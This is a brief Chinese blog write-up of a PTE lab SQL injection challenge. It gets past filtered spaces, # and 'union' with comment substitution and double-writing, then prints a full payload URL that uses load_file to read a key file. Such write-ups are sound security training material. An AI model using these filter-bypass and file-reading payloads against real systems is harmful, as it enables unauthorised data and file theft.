pte练习

文章讲述了在面对SQL注入时,如何处理被过滤的特殊字符如空格和#,通过使用/*和%23作为替代,并利用双写绕过union过滤,以及通过group_concat和load_file函数读取/home/key文件来获取key值的过程。
摘要由CSDN通过智能技术生成

SQL注入2

进入题目

在这里插入图片描述

一眼可见参数id存在注入

在这里插入图片描述该题过滤了’空格’和’#‘俩个符号,这里我用’/**/‘代替空格,’%23’代替’#',
用order by 猜出字段数为4。

在这里插入图片描述
在这里插入图片描述这里union也被过滤了,于是双写绕过过滤,2,3,4都为显示位。
在这里插入图片描述
直接读文件出key值
http://192.168.100.150:1081/vulnerabilities/fu1.php?id=-1%27)//ununionion//select//1,(select//group_concat(load_file(‘/home/key’))),3,4%23
在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值